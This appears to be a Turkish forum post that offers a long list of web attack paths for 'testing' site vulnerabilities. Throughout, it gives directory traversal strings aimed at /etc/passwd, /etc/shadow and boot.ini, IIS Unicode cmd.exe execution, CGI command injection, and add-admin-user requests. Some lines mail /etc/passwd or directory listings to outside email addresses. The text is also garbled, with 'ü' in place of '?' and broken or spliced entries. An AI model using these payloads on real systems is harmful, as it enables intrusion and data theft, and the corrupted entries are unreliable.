Web Sitesi Açıklarını Test Etmek
Aşağıdaki kodlar sayesinde site açıklarını test edebilirsiniz...
Ya da bir script programı sayesinde de bunu yapabilirsiniz... Kodlar Kod:
/./ /.. /../.. /..../ /....../ /....../ /......../ /~ /+/ /+./ /++/ /++./ /%00/ :2301 /2600-cgi/ezmlm-cgi /%2E%2E /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts /%2E%2E/%2E%2E/Program%20Files/AnalogX/SimpleServer/www/server.log :3000/../../hosts :3128/../../../../ :3128/../../../conf/Eserv.ini :444/..........autoexec.bat :5000/ :800/../.. :8000/cgi/wja?page=wja :8000/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt :8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp :8000/servlet/jsp/../../tst.txt :8000/servlet/ssifilter/../../test.jsp :8002/Newuser?Image=../../database/rbsserv.mdb :8003/Display :800/C:/ :8010/ :8010// :8010/..../ :8010/c:// :8010/d:// :8010/Guide/../../../../../../../../../../../../../../../etc/shadow :8010/Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.macnt/account.settings :801/../../../../../../../../etc/hosts :8080/anything.jsp :8080/../../../conf/Eserv.ini :8080/examples/jsp/snp/anything.snp :8080/tea/dynamic/system/teaservlet/Adminüadmin=true :8088 :80/../../../autoexec.bat :8100//WEB-INF/ :8100//WEB-INF/webapp.properties :8100//WEB-INF/web.xml :8383 :8888/ :8888/ab2/@Ab2Admin :8888/cgi-bin/admin/admin :8888/cgi-bin/admin/adminücommand=add_user&uid=percebe&password=perceb e&re_password=percebe :8987/sawmillürfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3 :9000/cgi-bin/query%3f :901 :9090 :9090/board.html :9090/examples/applications/bboard/bboard_frames.html :9090/servlet/com.sun.server.http.pagecompile.jsp92.JspServlet/board.html :9998/ /.access /achg.htr /active.log /ad.cgiüfile=../../../../../../../../etc/hosts /admin/ /admin.cgi /Admin_files/order.log /admin.htm /admin.html /admin/includes/ /admin.php3 /admin.php3üadmin=whatever /admin.pl /admin-serv/config/admpw /admin.shtml /admisapi/fpadmin.htm /ads/admin.cgi /ads/adpassword.txt /adsamples/config/site.csc /AdvWorks/equipment/catalog_type.asp /advworks/equipment/catalog_type.asp /aexp2.htr 
/aexp3.htr /aexp4b.htr /aglimpse /Album/ümode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F.. %2F..%2Fetc&dispsize=640&start=0 /aliredir.exe /....../ all /../../../../ all /amadmin.pl /AnalogX /anot3.htr /AnyForm2 /anything.jsp /architext_query.pl /args.bat /ASPSamp/AdvWorks/equipment/catalog_type.asp /AT-admin.cgi /auctionweaver.pl /_AuthChangeUrl /_AuthChangeUrlü /authors.pwd /....../autoexec.bat /........./autoexec.bat /......autoexec.bat /aux /bash /.bash_history /bb-dnbd/bb-hist.sh /bboard_frames.html /beaninfo.cfm /bigconf.cgi /~bin /~bin/ /bin /bin/ /bin/common/user_update_admin.pl /bin/common/user_update_passwd.plüuser_id=V&firstname=FI&lastn ame=LA&course_id=SID&password1=NEWPWD&password2=NE WPWD /bizdb1-search.cgi /blabla.ida /blabla.idc /blabla.idq /blabla.idw /bnbform /bnbform.cgi /../../../../../../../boot.ini /../../boot.ini /build.cgi /campas /carbo.dll /cart32.exe /cart.cgi /catalog.nsf /catalog.nsf/ /ccbill/ /ccbill/secure/ccbill.log /cd/../config/html/cnf_gi.htm /cfappman/index.cfm /cfdocs/cfmlsyntaxcheck.cfm /cfdocs/exampleapp/docs/sourcewindow.cfm /cfdocs/exampleapp/docs/sourcewindow.cfmüTemplate= /cfdocs/exampleapp/email/application.cfm /cfdocs/exampleapp/email/getfile.cfm /cfdocs/exampleapp/email/getfile.cfmüfilename=c:oot.ini /cfdocs/exampleapp/email/getfile.cfmüfilename=c:oot.ini /cfdocs/exampleapp/publish/admin/addcontent.cfm /cfdocs/exampleapp/publish/admin/addcontent.cfm /cfdocs/exampleapp/publish/admin/application.cfm /cfdocs/examples/cvbeans/beaninfo.cfm /cfdocs/examples/CVLibrary/GetFile.CFMüFT=Text&FST=Plain&FilePath=C:oot.ini /cfdocs/examples/httpclient/mainframeset.cfm /cfdocs/examples/parks/detail.cfm /cfdocs/expelval/displayopenedfile.cfm /cfdocs/expelval/exprcalc.cfm /cfdocs/expelval/openfile.cfm /cfdocs/expelval/sendmail.cfm /cfdocs/expelvel/openfile.cfm /cfdocs/expeval/displayopenedfile.cfm /cfdocs/expeval/eval.cfm /cfdocs/expeval/exprcalc.cfm /cfdocs/expeval/openfile.cfm /cfdocs/expeval/sendmail.cfm /cfdocs/expressions.cfm 
/cfdocs/MOLE.CFM /cfdocs/root.cfm /cfdocs/snippets/evaluate.cfm /cfdocs/snippets/fileexist.cfm /cfdocs/snippets/fileexists.cfm /cfdocs/snippets/gettempdirectory.cfm /cfdocs/snippets/setlocale.cfm /cfdocs/snippets/viewexample.cfm /cfdocs/snippets/viewexample.cfmüTagname= /cfdocs/TOXIC.CFM /cfdocs/zero.cfm /CFIDE/Administrator/startstop.html /cfide/Administrator/startstop.html /cfmlsyntaxcheck.cfm /cfusion/cfapps/forums/data/forums.mdb /cfusion/cfapps/forums/forums_.mdb /cfusion/cfapps/security/data/realm.mdb /cfusion/cfapps/security/realm_.mdb /cfusion/database/cfexamples.mdb /cfusion/database/cfsnippets.mdb /cfusion/database/cypress.mdb /cfusion/database/smpolicy.mdb /cgi /cgi/ /cgi-bin /cgi-bin/ /cgibin /cgibin/ /cgi-bin/abuse.manüfile=&domain=&script= /cgi-bin/ad.cgiüfile=../../../../../../../../etc/hosts /cgi-bin/add_ftp.cgi /cgi-bin/admin.cgi /cgi-bin/Admin_files/order.log /cgi-bin/adp /cgi-bin/adpassword.txt /cgi-bin/ads.cgi /cgi-bin/ads.setup /cgi-bin/af.cgi /cgi-bin/aglimpse /cgi-bin/alibaba.pl /cgi-bin/alibaba.pl|dir /cgi-bin/alibaba.pl|dir /cgi-bin/aliredir.exe /cgi-bin/allmanage/adp /cgi-bin/allmanage.cgi /cgi-bin/allmanage/k /cgi-bin/allmanage.pl /cgi-bin/allmanage/settings.cfg /cgi-bin/allmanageup.pl /cgi-bin/allmanage/userfile.dat /cgibin/amadmin.plüsetpasswd /cgi-bin/AnyBoard.cgi /cgi-bin/anyboard.cgi /cgi-bin/AnyForm /cgi-bin/AnyForm2 /cgi-bin/archie /cgi-bin/architext_query.cgi /cgi-bin/architext_query.pl /cgi-bin/ash /cgi-bin/AT-admin.cgi /cgi-bin/AT-generate.cgi /cgi-bin/authorize/dbmfiles/users /cgi-bin/awl/auctionweaver.pl /cgi-bin/awl/auctionweaver.plüflag1=1&catdir=................&f romfile=Boot.ini /cgi-bin/ax-admin.cgi /cgi-bin/ax.cgi /cgi-bin/axs.cgi /cgi-bin/bash /cgi-bin/bb-ack.sh /cgi-bin/bb-dnbd /cgi-bin/bb-histlog.sh /cgi-bin/bb-hist.sh /cgi-bin/bb-hist.shüHISTFILE=../../../../../../etc/hosts /cgi-bin/bb-hist.shüHISTFILE=/home/* /cgi-bin/bb-hostsvc.sh /cgi-bin/bb-hostsvc.shüHOSTSVC=/../../../../../../../../etc/hosts 
/cgi-bin/bb-replog.sh /cgi-bin/bb-rep.sh /cgi-bin/bigconf.cgi /cgi-bin/bigconf.cgi all /cgi-bin/bizdb1-search.cgi /cgi-bin/bizdb1-search.cgiütemplate=bizdb-summary&dbname=;ls|mail%[email protected]|& f6=^a.*&action=searchdbdisplay /cgi-bin/blabla?%0a/bin/cat%20/etc/passwd /cgi-bin/bnbform /cgi-bin/bnbform.cgi /cgi-bin/bnbform.pl /cgi-bin/build.cgi /cgi-bin/cached_feed.cgiü../../../.+/etc/hosts /cgi-bin/cachemgr.cgi /cgi-bin/calendar /cgi-bin/calender_admin.pl /cgi-bin/calender.pl /cgi-bin/campas /cgi-bin/campasü%0acat%0a/etc/passwd%0a /cgi-bin/carbo.dll /cgi-bin/cart32.exe/expdate /cgi-bin/cart.pl /cgi-bin/cat /cgi-bin/cgiemail/uargg.txt /cgi-bin/cgiforum.cgiüthesection=../../../../../../etc/hosts%00 /cgi-bin/cgiforum.plüthesection=../../../../../../etc/hosts%00 /cgi-bin/cgi-lib.pl /cgi-bin/CGImail.exe /cgi-bin/cgimail.exe /cgi-bin/Cgitest.exe /cgi-bin/cgitest.exe /cgi-bin/cgiwrap /cgi-bin/cgiwrap /cgi-bin/classified.cgi /cgi-bin/classifieds /cgi-bin/classifieds.cgi /cgi-bin/clickresponder.pl /cgi-bin/cmd.exe /cgi-bin/.cobalt/siteUserMod.cgi /cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi /cgi-bin/commander.pl /cgi-bin/cookmail /cgi-bin/cookmail/cookmail /cgi-bin/cookmail/cookmail.exe /cgi-bin/core /cgi-bin/Count.cgi /cgi-bin/count.cgi /cgi-bin/counterbanner /cgi-bin/counterbanner-ord /cgi-bin/counterfiglet /cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id /cgi-bin/counterfiglet-ord /cgi-bin/counter-ord /cgi-bin/cpmdaemon.cgi /cgi-bin/csh /cgi-bin/cvsweb.cgi /cgi-bin/data/nicks /cgi-bin/date /cgi-bin/day5datacopier.cgi /cgi-bin/day5datanotifier.cgi /cgi-bin/day5notifier /cgi-bin/db2www/library/document.d2w/reportüuid=UNKNOWN&pwd=&search_type=SIMPLE&r_host= &last_page=db2www0022.html&fn=db2www.html /cgi-bin/dbman/db.cgi /cgi-bin/dbmlparser.exe /cgi-bin/dcforum/install_help.cgi /cgi-bin/dcguest.cgi /cgi-bin/dcguest/dcguest.cgi /cgi-bin/dfire.cgi /cgi-bin/dig.cgi /cgi-bin/disk2server.cgi /cgi-bin/dnewsweb /cgi-bin/donothing /cgi-bin/download.cgi /cgi-bin/dumpenv 
/cgi-bin/dumpenv.pl /cgi-bin/echo /cgi-bin/echo.bat /cgi-bin/edit.pl /cgi-bin/edit.pl /cgi-bin/environ.cgi /cgi-bin/environ.pl /cgi-bin/everythingform.cgiüconfig=../../../../../../../../bin/ping&Name=xx&[email protected] /cgi-bin/ews /cgi-bin/excite /cgi-bin/ezmlm-cgi /cgi-bin/faxsurvey /cgi-bin/faxsurveyü/bin/ls%20-a /cgi-bin/.fhp /cgi-bin/fi /cgi-bin/fiü/etc/passwd /cgi-bin/filemail /cgi-bin/filemail.cgi /cgi-bin/filemail.pl /cgi-bin/files.pl /cgi-bin/finger /cgi-bin/finger.cgi /cgi-bin/finger.cgiüaction=archives&cmd=specific&&filename= 99.10.28.15.23.username.|/bin/ls| /cgi-bin/finger?@localhost /cgi-bin/finger.pl /cgi-bin/[email protected]%3B%2Fbin%2Fmail+riotnation@ hotmail.com+%3C+etc%2Fpasswd /cgi-bin/flexform /cgi-bin/flexform.cgi /cgi-bin/foo.cmdüxxx&dir /cgi-bin/FormHandler.cgi /cgi-bin/formhandler.cgi /cgi-bin/FormMail.pl /cgi-bin/formmail.pl /cgi-bin/formprocessor.aspü[email protected]&Ma [email protected]&Message=tst&MailTemplate1=/cgi-bin/formprocessor.asp /cgi-bin/formto.pl /cgi-bin/fortune /cgi-bin/forum-admin.pl /cgi-bin/forumdisplay.cgi /cgi-bin/forum.pl /cgi-bin/fpcount.exe /cgi-bin/fpexplore.exe /cgi-bin/fpexplorer.exe /cgi-bin/ftpdiag.cgi /cgi-bin/ftp/ftp.plüdir=../../../../../../etc /cgi-bin/futureforum.cgi /cgi-bin/gbook.cgiü_MAILTO=xx;ls /cgi-bin/get16.exe /cgi-bin/get32.exe /cgi-bin/get32.exe|dir /cgi-bin/getdoc.cgi /cgi-bin/gH.cgi /cgi-bin/glimpse /cgi-bin/guestadd.pl /cgi-bin/guestbook.cgi /cgi-bin/guestbook.pl /cgi-bin/GW5 /cgi-bin/GW5/GWWEB.EXE /cgi-bin/GW5/GWWEB.EXEüHELP=bad-request /cgi-bin/GW5/GWWEB.EXEüHELP=../../../../../index /cgi-bin/GWWEB.EXE /cgi-bin/handler /cgi-bin/handler.cgi /cgi-bin/h*llo.bat /cgibin/htgrep/file=index.html&hdr=/etc/hosts /cgi-bin/htimage.exe /cgi-bin/htmldocs /cgi-bin/html_pageüTEMPLATE=main /cgi-bin/htmlscript /cgi-bin/htmlscriptü../../../../../../etc/passwd /cgi-bin/htsearch /cgi-bin/htsearchüexclude=%60%60 /cgi-bin/icat /cgi-bin/iisadmpwd/achg.htr /cgi-bin/iisadmpwd/aexp2.htr /cgi-bin/iisadmpwd/aexp.htr 
/cgi-bin/iisadmpwd/anot.htr /cgi-bin/imagemap /cgi-bin/imagemap.c /cgi-bin/imagemap.exe /cgi-bin/imapcern.exe /cgi-bin/imapncsa.exe /cgi-bin/info2html /cgi-bin/info2www /cgi-bin/info2wwwü(../../../../../../../bin/mail [email protected]+c:InetPubwwwrootcmd.pl+&+.p l /perl.exe /perl/files.pl /perlshop.cgi /pfdisplay.cgi /phf /photoads/ /photoads/cgi-bin/ /photoads/cgi-bin/env.cgi /.photon/voyager/config.full /php.cgi /phpgroupware/inc/phpgwapi/phpgw.inc.php /phpPhotoAlbum/getalbum.php?album=../../../etc/ /ping all /pingüSomeCrapHere /piranha/secure/passwd.php3 /piranha/secure/passwd.php3üusername=piranha&passwd=q /pollit /Poll_It_SSI_v2.0.cgi /Poll_It_v2.0.cgi /post16.exe /ppwb/Temp/ /ppwd /prd.i/pgen/ /printenv /_private /_private/form_results.htm /_private/form_results.txt /_private/orders.htm /_private/orders.txt /_private/orders.txt /_private/register.htm /_private/register.txt /_private/register.txt /_private/registrations.htm /_private/registrations.txt /_private/shopping_cart.mdb /products/phpPhotoAlbum/explorer.php?folder=../../../../../../../etc/ /pservlet.html /PSUser/PSCOErrPage.htm /publisher/ /pw/storemgr.pw /quikstore.cfg /random_banner/index.cgiüimage_list=alternative_image.list&html_f ile=../../../../../etc/hosts /random_banner/index.cgiüimage_list=alternative_image.list&html_f ile=|ls%20-la| /redir.cgi /redirect.cgi /redirect.pl /redir.pl /repost.asp /rguest.exe /robots.txt /~root /~root/ /root/ /rpm_query /rsh /rwwwsh*ll.pl /s97_cgi.exe /s_97.vts /sam._ /samples/ /samples/search/queryhit.htm /~sbin/ /script/ /scripts /scripts/ /scripts/alibaba.pl|dir /scripts/args.bat /scripts/args.cmd /scripts/awl/auctionweaver.pl /scripts/bdir.htr /scripts/bigconf.cgi /scripts/..%c0%af../winnt/system32/cmd.exeü/c+dir+c: /scripts/..%c1%1c../winnt/system32/cmd.exeü/c+dir+c: /scripts/..%c1%9c../winnt/system32/cmd.exeü/c+dir+c: /scripts/c32web.exe/ChangeAdminPassword /scripts/Carello/add.exe /scripts/cart32.exe/cart32clientlist 
/scripts/cart32.exe/cart32clientlistüpasswd=wemilo /scripts/CGImail.exe /scripts/cgimail.exe /scripts/Cgitest.exe /scripts/../../cmd.exe /scripts/cmd.exe /scripts/../../cmd.exeü%2FC+echo+"hacked!">c:h*llo.bat /scripts/convert.bas /scripts/counter.exe /scripts/cpshost.dll /scripts/..%d0%af../winnt/system32/cmd.exeü/c+dir+c: /scripts/..%d1%9c../winnt/system32/cmd.exeü/c+dir+c: /scripts/dbman/db.cgiüdb=invalid-db /scripts/dbman/db.cgiüdb=tedb /scripts/dbmlparser.exe /scripts/emurl/RECMAN.dll /scripts/emurl/RECMAN.dllü /scripts/excite /scripts/files.pl /scripts/foo.cmdüxxx&dir /scripts/Fpadmcgi.exe /scripts/fpcount.exe /scripts/fpexplorer.exe /scripts/get32.exe|dir /scripts/GW5/GWWEB.EXE /scripts/htimage.exe /scripts/iisadmin/bdir.htr /scripts/iisadmin/bdir.htr?dir=htüüc: /scripts/iisadmin/default.htm /scripts/iisadmin/ism.dll /scripts/iisadmin/ism.dll%3fhttp/dir /scripts/iisadmin/ism.dllühttp/dir /scripts/iisadmin/ism.dllühttp/dir%20..../ /scripts/iisadmin/samples/ctgestb.htx /scripts/iisadmin/samples/ctgestb.idc /scripts/iisadmin/samples/details.htx /scripts/iisadmin/samples/details.idc /scripts/iisadmin/samples/query.htx /scripts/iisadmin/samples/query.idc /scripts/iisadmin/samples/register.htx /scripts/iisadmin/samples/register.idc /scripts/iisadmin/samples/sample2.htx /scripts/iisadmin/samples/sample.htx /scripts/iisadmin/samples/sample.idc /scripts/iisadmin/samples/viewbook.htx /scripts/iisadmin/samples/viewbook.idc /scripts/iisadmin/tools/ct.htx /scripts/iisadmin/tools/ctss.idc /scripts/iisadmin/tools/dsnform.exe /scripts/iisadmin/tools/getdrvrs.exe /scripts/iisadmin/tools/mkilog.exe /scripts/iisadmin/tools/newdsn.exe /scripts/imagemap.exe /scripts/input2.bat /scripts/input.bat /scripts/issadmin/bdir.htr /scripts/mlog.html /scripts/mylog.html /scripts/no-such-file.pl /scripts/perl /scripts/perlü /scripts/perl.exe /scripts/pfieffer.bat /scripts/pfieffer.cmd /scripts/phpmlog.phtml /scripts/phpmylog.phtml /scripts/plusmail /scripts/postinfo.asp 
/scripts/process_bug.cgi /scripts/proxy/w3proxy.dll /scripts/pu3.pl /scripts/queryümss=../config /scripts/repost.asp /scripts/repost.asp /scripts/rguest.exe /scripts/run.exe /scripts/samples/ctguestb.idc /scripts/samples/details.idc /scripts/samples/search/author.idq /scripts/samples/search/filesize.idq /scripts/samples/search/filetime.idq /scripts/samples/search/queryhit.idq /scripts/samples/search/queryhit.idqüCiRestriction=%23FILENAME%3D*.pwd&CiM axRecordsPerPage=10&CiScope=%2F&TemplateName=query hit&CiSort=rank%5Bd%5D&HTMLQueryForm=%2Fsamples%2F search%2Fqueryhit.htm /scripts/samples/search/queryhit.idqüCiRestriction=%23FILENAME%3D*.pwl&CiM axRecordsPerPage=10&CiScope=%2F&TemplateName=query hit&CiSort=rank%5Bd%5D&HTMLQueryForm=%2Fsamples%2F search%2Fqueryhit.htm /scripts/samples/search/simple.idq /scripts/samples/search/webhits.exe /scripts/script.bat%3f&dir /scripts/script.cmd%3f&dir /scripts/scriptssnorkerz.bat /scripts/scriptssnorkerz.cmd /scripts/search.cgiületter=........winnt /scripts/slxweb.dll /scripts/slxweb.dll/admin /scripts/test.bat /scripts/test.exe /scripts/tools/dsnform.exe /scripts/tools/getdrvrs.exe /scripts/tools/getdrvs.exe /scripts/tools/mkilog.exe /scripts/tools/newdsn.exe /scripts/tools/newdsn.exe%3fdriver=Microsoft%2BAccess%2BDriver%2B %28*.mdb%29&dsn=Web%20SQL&dbq=c:web.mdb&newdb=CREA TE_DB&attr= /scripts/tst.bat|dir /scripts/upload.asp /scripts/upload.asp /scripts/uploader.exe /scripts/uploadn.asp /scripts/uploadx.asp /scripts/visadmin.exe /scripts/wa.exe /scripts/webbbs.exe /scripts/wguest.exe /scripts/win-c-sample.exe /scripts/wsisa.dll |